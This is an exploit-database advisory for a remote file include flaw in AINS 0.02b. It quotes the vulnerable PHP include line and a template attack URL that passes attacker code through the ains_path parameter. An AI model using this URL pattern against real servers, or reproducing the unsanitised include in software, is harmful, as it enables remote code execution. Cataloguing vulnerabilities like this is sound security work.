header-logo
Suggest Exploit
vendor:
AINS
by:
ThE dE@Th
7.5
CVSS
HIGH
Remote File Include
Not provided
CWE
Product Name: AINS
Affected Version From: 0.02b
Affected Version To: 0.02b
Patch Exists: NO
Related CWE: Not provided
CPE: Not provided
Metasploit:
Other Scripts:
Platforms Tested:
2007

AINS 0.02b – Remote File Include Vulnerabilities

This vulnerability allows remote attackers to include arbitrary files via a URL in the ains_path parameter in ains_main.php.

Mitigation:

The vendor should sanitize user input before including files to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

AINS 0.02b - Remote File Include Vulnerabilities

Download:http://puzzle.dl.sourceforge.net/sourceforge/wassup/AINS002beta.zip
Finded by ThE dE@Th
Greetings For :AsB-May Team & HaCk.eGy


ains_main.php:


include("$ains_path/ains_global.inc");


http://www.site.com/[path]/ains_main.php?ains_path=[evil_code]

# milw0rm.com [2007-01-26]

Navigation

Suggest Exploit

Services By CQR